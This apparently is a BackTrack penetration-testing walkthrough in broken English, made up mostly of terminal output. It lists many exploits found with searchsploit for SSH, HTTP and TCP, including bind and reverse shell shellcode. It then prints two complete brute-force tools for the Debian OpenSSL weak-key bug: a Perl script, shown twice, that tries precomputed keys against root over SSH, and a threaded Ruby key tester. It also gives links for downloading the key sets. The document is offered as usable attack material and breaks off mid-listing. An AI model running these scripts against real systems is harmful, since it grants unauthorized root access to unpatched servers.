Privilege escalation
In practice Privilage Escalation, we
first scan the IP addresses which we will exploit, in this case I use
tools and Zenmap nessusd.
with search service SSH the existed at eksploitDB
root@bt:/pentest/exploits/exploitdb#
./searchsploit ssh
Description
Path
---------------------------------------------------------------------------
-------------------------
OpenSSH/PAM <= 3.6.1p1 Remote Users
Discovery Tool /linux/remote/25.c
OpenSSH/PAM <= 3.6.1p1 Remote Users
Ident (gossh.sh) /linux/remote/26.sh
glibc-2.2 and openssh-2.3.0p1 exploits
glibc >= 2.1.9x /linux/local/258.sh
SSH (x2) Remote Root Exploit
/multiple/remote/349.txt
Dropbear SSH <= 0.34 Remote Root
Exploit /linux/remote/387.c
phpBB <= 2.0.10 Bot Install
(Altavista) (ssh.D.Worm) /php/webapps/740.pl
Dropbear / OpenSSH Server
(MAX_UNAUTH_CLIENTS) Denial of Service
/multiple/dos/1572.pl
freeSSHd <= 1.0.9 Key Exchange
Algorithm Buffer Overflow Exploit /windows/remote/1787.py
OpenSSH <= 4.3 p1 (Duplicated Block)
Remote Denial of Service Exploit /multiple/dos/2444.sh
Portable OpenSSH <= 3.6.1p-PAM /
4.1-SUSE Timing Attack Exploit /multiple/remote/3303.sh
Portable OpenSSH <= 3.6.1p-PAM /
4.1-SUSE Timing Attack Exploit /multiple/remote/3303.sh
IpSwitch WS_FTP Server with SSH 6.1.0.0
Remote Buffer Overflow PoC /windows/dos/5044.pl
Mambo Component ahsShop <= 1.51
(vara) SQL Injection Vulnerability /php/webapps/5335.txt
Debian OpenSSL Predictable PRNG
Bruteforce SSH Exploit /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG
Bruteforce SSH Exploit (ruby) /multiple/remote/5632.rb
freeSSHd 1.2.1 Remote Stack Overflow
PoC (auth) /windows/dos/5709.pl
Debian OpenSSL Predictable PRNG
Bruteforce SSH Exploit (Python) /linux/remote/5720.py
freeSSHd 1.2.1 (Post Auth) Remote SEH
Overflow Exploit /windows/remote/5751.pl
Debian OpenSSH Remote SELinux Privilege
Elevation Exploit (auth) /linux/remote/6094.txt
freeSSHd 1.2.1 sftp rename Remote
Buffer Overflow PoC (auth) /windows/dos/6800.pl
GoodTech SSH (SSH_FXP_OPEN) Remote
Buffer Overflow Exploit /windows/remote/6804.pl
freeSSHd 1.2.1 sftp realpath Remote
Buffer Overflow PoC (auth) /windows/dos/6812.pl
FreeSSHd 1.2.1 (rename) Remote Buffer
Overflow Exploit (SEH) /windows/remote/8295.pl
ProSSHD v1.2 20090726 Buffer Overflow
Exploit /windows/remote/11618.pl
FreeSSHD 1.2.4 Remote Buffer Overflow
DoS /windows/dos/11842.py
ProSSHD 1.2 remote post-auth exploit
(w/ASLR and DEP bypass) /windows/remote/12495.pl
linux/x86 append rsa key to
/root/.ssh/authorized_keys2 295 bytes
/lin/x86/shellcode/13330.c
Novell Netware v6.5 OpenSSH Remote
Stack Overflow /novell/dos/14866.txt
SecureCRT <= 4.0 Beta 2 SSH1 Buffer
Overflow /windows/remote/16460.rb
FreeSSHd 1.0.9 Key Exchange Algorithm
String Buffer Overflow /windows/remote/16461.rb
OpenSSH 3.5p1 Remote Root Exploit for
FreeBSD /freebsd/remote/17462.txt
FreeSSHd Remote Denial of Service
/windows/dos/18268.txt
To go on existing on remote direcktori exploitdb
root@bt:/pentest/exploits/exploitdb# cd
platforms/multiple/remote
with open file exploit 5622.txt
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
cat 5622.txt
the debian openssl issue leads that
there are only 65.536 possible ssh
keys generated, cause the only entropy
is the pid of the process
generating the key.
This leads to that the following perl
script can be used with the
precalculated ssh keys to brute force
the ssh login. It works if such a
keys is installed on a non-patched
debian or any other system manual
configured to.
On an unpatched system, which doesn't
need to be debian, do the following:
keys provided by HD Moore -
http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the
/root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian
(this is the key this exploit will
break)
4. Run the perl script and give it the
location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl
pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl
/root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect)
{
system("echo ".join("
", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes
(less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
view the contents of remote directory
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
ls
10001.txt 12122.txt 14875.txt
16294.rb 16316.rb 1794.pm 3269.pl 3708.htm 5790.txt 828.c
9941.rb
10015.txt 12263.txt 15005.txt
16295.rb 16317.rb 17969.py 3303.sh 4093.pl 6122.rb
8458.txt 9942.rb
10071.txt 12264.txt 15298.txt
16297.rb 16318.rb 1799.txt 3358.pl 4266.py 6123.py 86.c
9943.rb
1007.html 12304.txt 15617.txt
16298.rb 16319.rb 18171.rb 3359.pl 4391.c 6130.c
8786.txt 9944.rb
10086.txt 12343.txt 15717.txt
16299.rb 16324.rb 18245.py 3363.pl 4399.html 6229.txt
879.pl 9945.rb
10087.txt 1263.pl 15937.pl
16300.rb 16495.rb 1997.php 3375.pl 4530.pl 6236.txt
8907.txt 9946.rb
10093.txt 12804.txt 1602.c
16301.rb 16784.rb 2017.pl 3376.pl 4556.txt 67.c
9039.txt 9948.rb
10095.txt 1292.pm 16041.txt
16302.rb 16789.rb 201.c 3377.pl 4567.pl 689.pl 95.c
9949.rb
10579.py 1369.html 16103.txt
16303.rb 16870.rb 2053.rb 3378.pl 4673.rb 705.pl
9651.txt 9951.rb
1114.c 13787.txt 16137.c
16304.rb 16985.rb 2061.txt 3405.txt 4761.pl 745.cgi
9718.txt 9972.c
11203.py 13850.pl 16286.rb
16305.rb 16990.rb 2082.html 3425.txt 4877.txt 746.pl
9829.txt 9987.txt
11662.txt 14360.txt 16287.rb
16308.rb 17068.py 2784.html 3452.php 5215.txt 7760.php
9843.txt 9993.txt
11817.txt 14386.html 16288.rb
16309.rb 17078.java 2837.sql 349.txt 5257.py 7781.txt
9913.rb 9994.txt
11856.txt 14387.html 16290.rb
16310.rb 17148.rb 2951.sql 3555.pl 5430.txt 8037.txt
9915.rb 9995.txt
1188.c 14388.html 16291.rb
16312.rb 17535.rb 300.c 3584.pl 5534.txt 805.c
9934.rb 9997.txt
12033.txt 14602.txt 16292.rb
16314.rb 17691.rb 3064.rb 3585.pl 5622.txt 8097.txt
9935.rb
12114.txt 14641.py 16293.rb
16315.rb 1791.patch 311.pl 3654.pl 5632.rb 8191.txt
9937.rb
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
cat 5622.txt
the debian openssl issue leads that
there are only 65.536 possible ssh
keys generated, cause the only entropy
is the pid of the process
generating the key.
This leads to that the following perl
script can be used with the
precalculated ssh keys to brute force
the ssh login. It works if such a
keys is installed on a non-patched
debian or any other system manual
configured to.
On an unpatched system, which doesn't
need to be debian, do the following:
keys provided by HD Moore -
http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the
/root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian
(this is the key this exploit will
break)
4. Run the perl script and give it the
location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl
pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl
/root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect)
{
system("echo ".join("
", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes
(less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
# milw0rm.com [2008-05-15]
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
cat
Display all 186 possibilities? (y or n)
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
cat 56
5622.txt 5632.rb
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
cat 5632.rb
#!/usr/bin/ruby
#
# Debian SSH Key Tester
# L4teral <l4teral [at] gmail com>
#
# This tool helps to find user accounts
with weak SSH keys
# that should be regenerated with an
unaffected version
# of openssl.
#
# You will need the precalculated keys
provided by HD Moore
# See
http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Usage:
# debian_openssh_key_test.rb <host>
<user> <keydir>
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
threads = []
keyfiles = []
host = ARGV.shift or raise "no
host given!"
user = ARGV.shift or raise "no
user given!"
keysdir = ARGV.shift or raise "no
key dir given!"
Dir.new(keysdir).each do |f|
if f =~ /\d+$/ then
keyfiles << f
queue << f
end
end
totalkeys = queue.length
currentkey = 1
THREADCOUNT.times do |i|
threads << Thread.new(i) do |j|
while !queue.empty?
keys = []
KEYSPERCONNECT.times { keys <<
queue.pop unless queue.empty? }
keys.map! { |f| f =
File.join(keysdir, f) }
keys.each do |k|
puts "testing key
#{currentkey}/#{totalkeys} #{k}..."
currentkey += 1
end
system "ssh -l #{user} -o
PasswordAuthentication=no -i #{keys.join(" -i ")} #{host}
\"exit\" &>/dev/null"
if $? == 0 then
keys.each do |k|
system "ssh -l #{user}
-o PasswordAuthentication=no -i #{k} #{host} \"exit\"
&>/dev/null"
if $? == 0 then
puts "KEYFILE FOUND:
\n#{k}"
exit
end
end
end
end
end
end
trap("SIGINT") do
threads.each { |t| t.exit() }
exit
end
threads.each { |t| t.join }
# milw0rm.com [2008-05-16]
root@bt:/pentest/exploits/exploitdb#
./searchsploit http
Description
Path
---------------------------------------------------------------------------
-------------------------
Apache HTTP Server 2.x Memory Leak
Exploit /windows/dos/9.c
Cisco IOS 12.x/11.x HTTP Remote Integer
Overflow Exploit /hardware/remote/77.c
Lexmark Multiple HTTP Servers Denial of
Service Vulnerability /hardware/dos/358.txt
Apache HTTPd Arbitrary Long HTTP
Headers DoS /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP
Headers DoS (c version) /linux/dos/371.c
WordPress Blog HTTP Splitting
Vulnerability /php/webapps/570.txt
Jana Server <= 2.4.4 (http/pna)
Denial of Service Exploit /windows/dos/667.c
OpenText FirstClass 8.0 HTTP Daemon
/Search Remote DoS /windows/dos/687.c
Apache <= 2.0.52 HTTP GET request
Denial of Service Exploit /multiple/dos/855.pl
Sumus 0.2.2 httpd Remote Buffer
Overflow Exploit /linux/remote/940.c
MailEnable Enterprise &
Professional https Remote BoF Exploit
/windows/remote/952.pl
Apache <= 2.0.49 Arbitrary Long HTTP
Headers Denial of Service /multiple/dos/1056.pl
Small HTTP Server <= 3.05.28
Arbitrary Data Execution Exploit
/windows/remote/1108.pl
Acunetix HTTP Sniffer Denial of Service
Exploit /windows/dos/1137.pl
Hasbani-WindWeb/2.0 - HTTP GET Remote
DoS /hardware/dos/1274.c
Oracle 9.2.0.1 Universal XDB HTTP Pass
Overflow Exploit /windows/remote/1365.pm
MS Windows IIS Malformed HTTP Request
Denial of Service Exploit (c) /windows/dos/1376.c
MS Windows IIS Malformed HTTP Request
Denial of Service Exploit (pl) /windows/dos/1377.pl
MS Windows IIS Malformed HTTP Request
Denial of Service Exploit (cpp) /windows/dos/1396.cpp
zawhttpd <= 0.8.23 (GET) Remote
Buffer Overflow DoS /linux/dos/1746.pl
gxine 0.5.6 (HTTP Plugin) Remote Buffer
Overflow PoC /linux/dos/1852.c
ImgSvr <= 0.6.5 (long http post)
Denial of Service Exploit /windows/dos/1980.pl
Streamripper <= 1.61.25 HTTP Header
Parsing Buffer Overflow Exploit /linux/remote/2274.c
Streamripper <= 1.61.25 HTTP Header
Parsing Buffer Overflow Exploit 2 /windows/remote/2277.c
RaidenHTTPD 1.1.49 (SoftParserFileXml)
Remote Code Execution Exploit /windows/remote/2328.php
SHTTPD 1.34 (POST) Remote Buffer
Overflow Exploit /windows/remote/2482.pl
MiniHttpServer Web Forum & File
Sharing Server 4.0 Add User Exploit /windows/remote/2651.c
HTTP Upload Tool (download.php)
Information Disclosure Vulnerability /php/webapps/2791.txt
Http explorer Web Server 1.02 Directory
Transversal Vulnerability /windows/remote/2974.pl
Acunetix WVS <= 4.0 20060717 HTTP
Sniffer Component Remote DoS /windows/dos/3078.pl
Sami HTTP Server 2.0.1 (HTTP 404 -
Object not found) DoS Exploit /windows/dos/3182.py
Apple CFNetwork HTTP Response Denial of
Service Exploit (rb code) /osX/dos/3200.rb
PHP-Nuke <= 8.0 Final (HTTP
Referers) Remote SQL Injection Exploit /php/webapps/3346.pl
Wserve HTTP Server 4.6 (Long Directory
Name) Denial of Service Exploit /windows/dos/3674.pl
Sami HTTP Server 2.0.1 POST Request
Denial of Service Exploit /windows/dos/3715.py
Versalsoft HTTP File Upload ActiveX
6.36 (AddFile) Remote DoS Exploit /windows/dos/3866.html
MiniWeb Http Server 0.8.x Remote Denial
of Service Exploit /windows/dos/4046.pl
Versalsoft HTTP File Uploader AddFile()
Remote Buffer Overflow Exploit /windows/remote/4200.html
corehttp 0.5.3alpha (httpd) Remote
Buffer Overflow Exploit /linux/remote/4243.c
EDraw Office Viewer Component 5.1
HttpDownloadFile() Insecure Method /windows/remote/4290.html
Lighttpd <= 1.4.16 FastCGI Header
Overflow Remote Exploit /multiple/remote/4391.c
Airsensor M520 HTTPD Remote Preauth DoS
/ BOF PoC /hardware/dos/4426.pl
Lighttpd <= 1.4.17 FastCGI Header
Overflow Remote Exploit /linux/remote/4437.c
Boa 0.93.15 HTTP Basic Authentication
Bypass Exploit /linux/remote/4542.py
Simple HTTPD <= 1.38 Multiple Remote
Vulnerabilities /windows/remote/4700.txt
Simple HTTPD <= 1.38 Multiple Remote
Vulnerabilities /windows/remote/4700.txt
Simple HTTPD <= 1.41 (/aux) Remote
Denial of Service Exploit /windows/dos/4717.py
RaidenHTTPD 2.0.19 (ulang) Remote
Command Execution Exploit /windows/remote/4747.vbs
Ruby 1.8.6 (Webrick Httpd 1.3.1)
Directory Traversal Vulnerability /multiple/remote/5215.txt
ChilkatHttp ActiveX 2.3 Arbitrary Files
Overwrite Exploit /windows/remote/5338.html
Novel eDirectory HTTP Denial of Service
Exploit /windows/dos/5344.py
VLC 0.8.6d httpd_FileCallBack Remote
Format String Exploit /windows/remote/5519.c
Novell eDirectory < 8.7.3 SP 10 /
8.8.2 HTTP headers DOS Vulnerability /windows/dos/5547.txt
uTorrent / BitTorrent WebIU HTTP
1.7.7/6.0.1 Range header DoS Exploit /windows/dos/5918.pl
IntelliTamper 2.07 HTTP Header Remote
Code Execution Exploit /windows/remote/6227.c
Samsung DVR SHR2040 HTTPD Remote Denial
of Service DoS PoC /hardware/dos/6394.pl
Cisco Router HTTP Administration CSRF
Command Execution Exploit /hardware/remote/6476.html
Cisco Router HTTP Administration CSRF
Command Execution Exploit 2 /hardware/remote/6477.html
fhttpd 0.4.2 un64() Remote Denial of
Service Exploit /linux/dos/6493.pl
Linksys Wireless ADSL Router (WAG54G
V.2) httpd DoS Exploit /hardware/dos/7535.php
EDraw Office Viewer 5.4
HttpDownloadFile() Insecure Method Vuln
/windows/remote/7762.html
Squid < 3.1 5 HTTP Version Number
Parsing Denial of Service Exploit /multiple/dos/8021.pl
GeoVision Digital Video Surveillance
System (geohttpserver) DT Vuln /windows/remote/8041.txt
MLdonkey <= 2.9.7 HTTP DOUBLE SLASH
Arbitrary File Disclosure Vuln /multiple/remote/8097.txt
Wordpress MU < 2.7 'HOST' HTTP
Header XSS Vulnerability /php/webapps/8196.txt
SW-HTTPD Server 0.x Remote Denial of
Service Exploit /multiple/dos/8245.c
Sami HTTP Server 2.x (HEAD) Remote
Denial of Service Exploit /windows/dos/8310.pl
Check Point Firewall-1 PKI Web Service
HTTP Header Remote Overflow /hardware/dos/8313.txt
Steamcast (HTTP Request) Remote Buffer
Overflow Exploit (SEH) [1] /windows/remote/8421.py
Steamcast (HTTP Request) Remote Buffer
Overflow Exploit (SEH) [2] /windows/remote/8422.py
Zervit HTTP Server <= 0.3 (sockets++
crash) Remote Denial of Service /windows/dos/8522.pl
Belkin Bulldog Plus HTTP Server Remote
Buffer Overflow Exploit /windows/remote/8554.py
httpdx <= 0.5b Multiple Remote
Denial of Service Vulnerabilities /windows/dos/8712.txt
httpdx <= 0.5b FTP Server (USER)
Remote BOF Exploit (SEH) /windows/remote/8716.py
httpdx <= 0.5b FTP Server (CWD)
Remote BOF Exploit (SEH) /windows/remote/8732.py
Lighttpd < 1.4.23 Source Code
Disclosure Vulnerability (BSD/Solaris bug)
/multiple/remote/8786.txt
httpdx <= 0.8 FTP Server
Delete/Get/Create Directories/Files Exploit
/windows/remote/8897.c
Multiple HTTP Server Low Bandwidth
Denial of Service (slowloris.pl) /multiple/dos/8976.pl
Multiple HTTP Server Low Bandwidth
Denial of Service #2 /multiple/dos/8991.php
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
HTTP SERVER (httpsv) 1.6.2 (GET 404)
Remote Denial of Service Exploit /windows/dos/9478.pl
MailEnable 1.52 HTTP Mail Service Stack
BOF Exploit PoC /windows/dos/9549.c
Xerver HTTP Server 4.32 Arbitrary
Source Code Disclosure Vuln /windows/remote/9649.txt
httpdx Web Server 1.4 (Host Header)
Remote Format String DoS Exploit /windows/dos/9657.pl
Techlogica HTTP Server 1.03 Arbitrary
File Disclosure Exploit /windows/remote/9660.pl
Xerver HTTP Server <= v4.32 Remote
Denial of Service /windows/dos/9717.txt
Xerver HTTP Server <= v4.32 Remote
Denial of Service /windows/dos/9717.txt
Xerver HTTP Server v4.32 XSS /
Directory Traversal Vulnerability
/multiple/remote/9718.txt
Xerver HTTP Server v4.32 XSS /
Directory Traversal Vulnerability
/multiple/remote/9718.txt
httpdx <= 1.4.6b source disclosure
/windows/webapps/9885.txt
httpdx 1.4 h_handlepeer BoF
/windows/remote/9886.txt
MiniShare HTTP 1.5.5 BoF
/windows/remote/9896.txt
DD-WRT HTTP v24-SP1 Command Injection
Vulnerability /linux/remote/10030.rb
Femitter HTTP Server 1.03 Remote Source
Disclosure /windows/remote/10047.txt
httpdx 1.4 Get Request Buffer Overflow
/windows/remote/10053.txt
Novell eDirectory HTTPSTK Login Stack
Overflow Vulnerability /windows/dos/10163.pl
OrzHTTPd Format String Exploit
/linux/remote/10282.py
iWeb HTTP Server Directory Transversal
Vulnerability /windows/webapps/10331.txt
CoreHTTP web server off-by-one buffer
overflow vulnerability /linux/dos/10349.py
Monkey HTTP Daemon < 0.9.3 Denial of
Service Vulnerability /linux/dos/10469.py
CoreHTTP Arbitrary Command Execution
Vulnerability /linux/remote/10610.rb
Multiple Media Player HTTP DataHandler
Overflow (Itunes /multiple/dos/11142.txt
cPanel HTTP Response Splitting
Vulnerability
/multiple/webapps/11211.txt
P2GChinchilla HTTP Server v1.1.1 Denial
Of Service Exploit /windows/dos/11254.pl
Apple Iphone/Ipod - Serversman 3.1.5
HTTP Remote DoS Exploit /hardware/dos/11273.py
httpdx v1.5.2 Remote Pre-Authentication
DoS (PoC crash) /windows/dos/11343.py
Apple Iphone/Ipod - FTP On The Go 2.1.2
- HTTP Remote DoS /hardware/dos/11472.py
Easy~Ftp Server v1.7.0.2 (HTTP) Remote
BOF Exploit /windows/remote/11500.py
RCA DCM425 Cable Modem micro_httpd
DoS/PoC /hardware/dos/11597.py
httpdx v1.5.3b Multiple - Remote
Pre-Authentication DoS (PoC crash) /windows/dos/11734.py
uhttp Server Path Traversal
Vulnerability
/multiple/remote/11856.txt
MultiThreaded HTTP Server v1.1
Directory Traversal
/multiple/remote/12304.txt
MultiThreaded HTTP Server v1.1 Source
Disclosure /windows/remote/12308.txt
MultiThreaded HTTP Server v1.1
Directory Traversal
/windows/remote/12331.txt
GeoHttpServer Remote DoS Vulnerability
/windows/dos/12531.pl
nginx [engine x] http server <=
0.6.36 Path Draversal
/multiple/remote/12804.txt
Utility for generating HTTP/1.x
requests for shellcodes
/generator/shellcode/13288.c
linux/x86 shellcode that forks a HTTP
Server on port tcp/8800 166 bytes /lin/x86/shellcode/13308.c
linux/x86 HTTP/1.x GET
/lin/x86/shellcode/13355.c
linux/x86 HTTP/1.x GET
/lin/x86/shellcode/13380.c
Motorola SB5101 Hax0rware Rajko HTTPD
Remote Exploit PoC /hardware/dos/13774.pl
QuickOffice v3.1.0 for iPhone/iPod
Touch Malformed HTTP Method Remote DoS /hardware/dos/13870.py
SasCam v2.6.5 Remote HTTP Server Crash
/windows/dos/13888.c
Weborf HTTP Server Denial of Service
Vulnerability /multiple/dos/14012.txt
UPlusFTP Server v1.7.1.01 [ HTTP ]
Remote Buffer Overflow [ Post Auth ] /windows/remote/14496.py
Xerver 4.32 Source Disclosure and HTTP
Authentication Bypass /windows/remote/14522.rb
Msxml2.XMLHTTP.3.0 Response Handling
Memory Corruption (MS10-051) /windows/dos/14609.py
Httpdx 1.5.4 Multiple Denial of Service
Vulnerabilities (http-ftp) PoC /windows/dos/14683.py
Mereo v1.9.2 Remote HTTP Server Denial
Of Service Vulnerability /windows/dos/14840.py
Integard Home and Pro v2 Remote HTTP
Buffer Overflow Exploit /win32/remote/14941.rb
Oracle Sun Java System Web Server -
HTTP Response Splitting /jsp/webapps/15290.txt
HP Data Protector Media Operations 6.11
HTTP Server Remote Integer Overflow DoS /windows/dos/15307.py
Sami HTTP Server 2.0.1 GET Request
Denial of Service Exploit /windows/dos/15422.pl
HttpBlitz Web Server Denial Of Service
Exploit /windows/dos/15821.py
httpdASM 0.92 Directory Traversal
/windows/remote/15861.txt
LifeType 1.2.10 HTTP Referer stored XSS
/php/webapps/15981.txt
Caedo HTTPd Server v 0.5.1 ALPHA Remote
File Download /windows/remote/16075.pl
SDP Downloader 2.3.0 (http_response)
Remote Buffer Overflow Exploit /windows/remote/16078.py
Majordomo2 - Directory Traversal
(SMTP/HTTP) /multiple/remote/16103.txt
Majordomo2 - Directory Traversal
(SMTP/HTTP) /multiple/remote/16103.txt
JAKCMS 2.0 PRO RC5 stored XSS via
useragent HTTP header Injection /php/webapps/16128.txt
Icy Phoenix 1.3.0.53a HTTP Referer
stored XSS /php/webapps/16199.txt
Ultra Shareware Office Control ActiveX
HttpUpload Buffer Overflow /windows/remote/16513.rb
Windows ANI LoadAniIcon() Chunk Size
Stack Buffer Overflow (HTTP) /windows/remote/16526.rb
Internet Explorer XML Core Services
HTTP Request Handling /windows/remote/16532.rb
Persits XUpload ActiveX MakeHttpRequest
Directory Traversal /windows/remote/16598.rb
HTTPDX tolog() Function Format String
Vulnerability /windows/remote/16732.rb
SHTTPD <= 1.34 URI-Encoded POST
Request Overflow (win32) /win32/remote/16759.rb
HTTPDX tolog() Function Format String
Vulnerability /windows/remote/16794.rb
HTTPDX h_handlepeer() Function Buffer
Overflow /windows/remote/16799.rb
Streamcast <= 0.9.75 HTTP User-Agent
Buffer Overflow /windows/remote/16800.rb
Webster HTTP Server GET Buffer Overflow
/windows/remote/16802.rb
Oracle 9i XDB HTTP PASS Overflow
(win32) /win32/remote/16809.rb
DD-WRT HTTP Daemon Arbitrary Command
Execution /cgi/webapps/16856.rb
MacOS X EvoCam HTTP GET Buffer Overflow
/osX/remote/16874.rb
Oracle WebLogic Session Fixation Via
HTTP POST /multiple/webapps/16959.txt
Kolibri <= v2.0 HTTP Server HEAD
Buffer Overflow /windows/remote/16970.rb
jHTTPd 0.1a Directory Traversal
Vulnerability /multiple/remote/17068.py
ZenPhoto 1.4.0.3 x-forwarded-for HTTP
Header presisitent XSS /php/webapps/17200.txt
Oracle HTTP Server XSS Header Injection
/multiple/webapps/17393.txt
Simple HTTPd 1.42 Denial of Servive
Exploit /windows/dos/17658.py
Simple HTTPd 1.42 PUT Request Remote
Buffer Overflow Vulnerability /windows/remote/17669.py
Apache httpd Remote Denial of Service
(memory exhaustion) /multiple/dos/17696.pl
Sunway Force Control SCADA 6.1 SP3
httpsrv.exe Exploit /windows/remote/17721.rb
Toko Lite CMS 1.5.2 (edit.php) HTTP
Response Splitting Vulnerability /php/webapps/17859.txt
FleaHttpd Remote Denial Of Service
Exploit /linux/dos/18120.py
Apache HTTP Server Denial of Service
/linux/dos/18221.c
lighttpd Denial of Service
Vulnerability PoC /linux/dos/18295.
root@bt:/pentest/exploits/exploitdb#
./searchsploit tcp
Description
Path
---------------------------------------------------------------------------
-------------------------
tcpdump ISAKMP Identification payload
Integer Overflow Exploit /linux/remote/171.c
Linux Kernel 2.2 (TCP/IP Weakness)
Exploit /linux/remote/237.c
MS Windows 2K/XP TCP Connection Reset
Remote Attack Tool /windows/dos/276.delphi
TCP Connection Reset Remote Exploit
/linux/remote/291.c
TCP SYN Denial of Service Exploit
(bang.c) /bsd/dos/343.c
OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote
Denial of Service Exploit /bsd/dos/869.c
Ethereal / tcpdump (rsvp_print)
Infinite Loop Denial of Service Exploit /multiple/dos/956.c
Tcpdump 3.8.x (ldp_print) Infinite Loop
Denial of Service Exploit /linux/dos/957.c
Tcpdump 3.8.x (rt_routing_info)
Infinite Loop Denial of Service Exploit /linux/dos/958.c
Tcpdump 3.8.x/3.9.1 (isis_print)
Infinite Loop DoS Exploit /linux/dos/959.c
TCP TIMESTAMPS Denial of Service
Exploit /multiple/dos/1008.c
Tcpdump bgp_update_print Remote Denial
of Service Exploit /multiple/dos/1037.c
TCP-IP Datalook <= 1.3 Local Denial
of Service Exploit /windows/dos/1067.cpp
TCP Chat (TCPX) 1.0 Denial of Service
Exploit /windows/dos/1090.cpp
Snort <= 2.4.0 SACK TCP Option Error
Handling Denial of Service Exploit /multiple/dos/1213.c
Cisco PIX Spoofed TCP SYN Packets
Remote Denial of Service Exploit /hardware/dos/1338.pl
panic-reloaded TCP Denial of Service
Tool /multiple/dos/1671.c
MS Windows TCP/IP Protocol Driver
Remote Buffer Overflow Exploit /windows/dos/1967.c
Dart Communications PowerTCP Service
Control Remote BoF Exploit /windows/remote/3982.html
Dart Communications PowerTCP ZIP
Compression Remote BoF Exploit /windows/remote/3984.html
Dart Communications PowerTCP FTP module
Remote BOF Exploit /windows/remote/6793.html
PowerTCP FTP module Multiple Technique
Exploit (SEH/HeapSpray) /windows/remote/6840.html
Psi Jabber Client (8010/tcp) Remote
Denial of Service Exploit (win/lin) /multiple/dos/7555.py
Cisco ASA/PIX Appliances Fail to
Properly Check Fragmented TCP Packets /hardware/dos/8393.txt
TCPDB 3.8 Arbitrary Add Admin Account
Vulnerability /php/webapps/8626.txt
Eggdrop/Windrop 1.6.19 ctcpbuf Remote
Crash Vulnerability /multiple/dos/8695.txt
Apple iTunes 8.1.1.10 (itms/itcp)
Remote Buffer Overflow Exploit (win) /windows/remote/8934.py
TCPDB 3.8 Remote Content Change Bypass
Vulnerabilities /php/webapps/9512.txt
linux/x86 shellcode that forks a HTTP
Server on port tcp/8800 166 bytes /lin/x86/shellcode/13308.c
linux/x86 listens for shellcode on
tcp/5555 and jumps to it /lin/x86/shellcode/13309.asm
linux/x86 TCP Proxy Shellcode 236 bytes
/lin/x86/shellcode/13381.c
linux/x86 Bind /bin/sh to 31337/tcp 80
bytes /lin/x86/shellcode/13387.c
linux/x86 Bind /bin/sh to 31337/tcp +
fork() 98 bytes /lin/x86/shellcode/13388.c
linux/x86 connect-back shellcode
127.0.0.1:31337/tcp 74 bytes /lin/x86/shellcode/13393.c
solaris/x86 portbind/tcp shellcode
generator
/solaris/x86/shellcode/13498.php
PTCPay GEN4 (buyupg.php) SQL Injection
Vulnerability /php/webapps/14086.txt
Automated Solutions Modbus/TCP OPC
Server Remote Heap Corruption PoC /windows/dos/16040.py
CA BrightStor Discovery Service TCP
Overflow /windows/remote/16408.rb
Microsoft DNS RPC Service
extractQuotedChar() Overflow (TCP)
/windows/remote/16748.rb
Zabbix Agent net.tcp.listen Command
Injection /freebsd/remote/16918.rb
Linux Kernel < 2.6.37-rc2 TCP_MAXSEG
Kernel Panic DoS /linux/dos/16952.c
Progea Movicon 11 TCPUploadServer
Remote Exploit /windows/remote/17034.py
OSX/Intel reverse_tcp shell x86_64 -
131 bytes /osX/shellcode/17224.s
MS11-064 TCP/IP Stack Denial of Service
/windows/dos/17981.py
root@bt:/pentest/exploits/exploitdb#
./searchsploit httpd
Description
Path
---------------------------------------------------------------------------
-------------------------
Apache HTTPd Arbitrary Long HTTP
Headers DoS /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP
Headers DoS (c version) /linux/dos/371.c
Sumus 0.2.2 httpd Remote Buffer
Overflow Exploit /linux/remote/940.c
zawhttpd <= 0.8.23 (GET) Remote
